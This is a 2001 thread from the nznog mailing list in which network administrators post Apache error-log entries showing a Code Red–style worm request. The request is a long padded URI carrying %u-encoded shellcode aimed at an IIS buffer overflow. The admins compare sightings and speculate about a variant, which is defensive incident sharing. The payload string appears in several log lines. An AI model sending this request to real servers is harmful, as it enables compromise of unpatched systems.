One of the AMP machines (120 monitors in the US see http://watt.nlanr.net/ and http://amp.nlanr.net/red.html, if you're interested) has seen two of these. None of the others have seen any. There's no GET. Looks a bit like a POST.
Sun Aug 5 06:20:04 PST 2001 --.156.231.202 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 90%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u 00=a HTTP/1.0
Host: --.156.233.5 Content-type: text/xml Content-length: 3379 Cache-Control: max-stale=0 <C8><C8>^A <CD>^O<B6><C9><89><8D>T<FE><FF><FF><8B><81>~0<9A>^B s<C3>f<C7><85>p<FF><FF><FF>^B On Tue, 7 Aug 2001, Mark Foster wrote:
[Tue Aug 7 13:56:39 2001] [error] [client 203.199.60.10] Invalid URI in request XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u 8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Ive had just one today, in the last half hour. None prior to that Did someone try to write a variant and screw up or maybe one of the infectees got weird?
At 13:58 7/08/2001 +1200, you wrote:
[Tue Aug 7 13:57:14 2001] [error] [client 203.228.144.15] Invalid URI in request XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Just started getting these. no default.ida?.
Has the worm turned, again?
Tim J. Shackleton ------------------+ +- Business http://www.netlink.co.nz/ Networks Admin/Programmer ----------+ +- Personal http://www.netnet.net.nz/ Netlink LTD -- DDI +64 4 922 8476 --+ +------------- Pager 64 +26 253 4356 +64 29 650 476 -- Cellular ---------+ +------------------------------------ ---- "Cold silence has a tendency to atrophy any sense of compassion" -----
--------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
--------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
---------------------------------------------------------------------------- Tony McGregor Mail: T.McGregor(a)cs.waikato.ac.nz Department of Computer Science Phone: +64 7 838 4651 Waikato University Fax: +64 7 858 5095 Private Bag 3105 Home: +64 7 825 5040 mobile: (021)313004 Hamilton, New Zealand www: http://www.cs.waikato.ac.nz/~tonym ---------------------------------------------------------------------------- --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog